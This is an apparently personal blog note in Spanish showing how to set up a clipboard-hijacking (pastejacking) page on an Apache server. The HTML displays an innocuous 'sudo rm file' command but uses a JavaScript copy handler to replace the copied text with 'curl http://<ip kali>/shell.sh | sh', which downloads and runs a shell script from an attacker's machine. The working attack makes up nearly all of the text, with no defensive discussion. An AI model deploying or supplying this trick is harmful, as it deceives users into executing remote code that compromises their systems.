se va a abrir el puerto
activar apache
activar apache
sudo systemctl start apache2 # En Ubuntu/Debian
sudo systemctl start httpd # En CentOS/Red Hat
crear html
debe llamarse index.html
al html.5
entre bodys
<p>Comando Linux</p>
<code><p id='copy'>sudo rm file</p> </code>
<script>
document.getElementById('copy').addEventListener(
'copy', function(e) {
e.clipboardData.setData('text/plain','curl http://<ip kali>/shell.sh | sh\n');
e.preventDefault();
}
);
No hay comentarios.:
Publicar un comentario